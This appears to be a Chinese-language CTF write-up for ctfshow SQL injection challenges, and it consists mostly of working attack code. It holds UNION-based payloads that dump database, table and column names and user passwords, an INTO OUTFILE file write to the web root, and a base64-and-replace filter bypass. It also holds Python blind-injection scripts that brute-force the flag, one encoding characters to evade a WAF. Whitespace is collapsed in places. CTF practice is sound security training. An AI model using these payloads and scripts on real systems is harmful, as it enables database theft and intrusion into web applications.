-1'union select 1,2,database()--+ //查询数据库名 -1'unionselect1,2,concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+ //查询指定数据库下的表名 -1'union select 1,2,concat(column_name) from information_schema.columns where table_name='ctfshow_user'--+ //查询指定表名的列名 -1'unionselect1,2,concat(id,username,password) from ctfshow_user--+ //查询指定表名的字段
web172:
和上一题几乎一样,只是换了表名,并且这一题的回显位置只有两个。
1
-1'union select 1,concat(id,username,password) from ctfshow_user2--+
-1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/2.txt' --+
另解:也可以将数字替换为特殊标记
1
-1' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(to_base64(password),'9','numI'),'0','numJ'),'1','numA'),'2','numB'),'3','numC'),'4','numD'),'5','numE'),'6','numF'),'7','numG'),'8','numH') from ctfshow_user4--+
for i inrange(46): if i < 5: #过滤flag,从第五位开始 continue for c in flagstr: data={ "tableName":payload.format(str(i),c) } resp=requests.post(url,data) if(resp.text.find("$user_count = 1;")>0): flag+=c break print("***盲注第{}位".format(str(i))) print("flag is ctfshow{}".format(flag))
flag = 'flag{' for i inrange(45): if i <= 5: continue for j inrange(127): data = { "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))" } r = requests.post(url,data=data) if r.text.find("$user_count = 43;")>0: ifchr(j) != ".": flag += chr(j) print(flag.lower())
#author:yu22x import requests import string url="http://72195b62-090a-49f9-af4e-ee004b8545a0.challenge.ctf.show/select-waf.php" s='0123456789abcdef-{}' defconvert(strs): t='concat(' for s in strs: t+= 'char(true'+'+true'*(ord(s)-1)+'),' print(t) return t[:-1]+")" flag='' for i inrange(1,45): print(i) for j in s: d = convert(f'^ctfshow{flag+j}') data={ 'tableName':f' ctfshow_user group by pass having pass regexp({d})' } #print(data) r=requests.post(url,data=data) #print(r.text) if("user_count = 1"in r.text): flag+=j print(flag) if j=='}': exit(0) break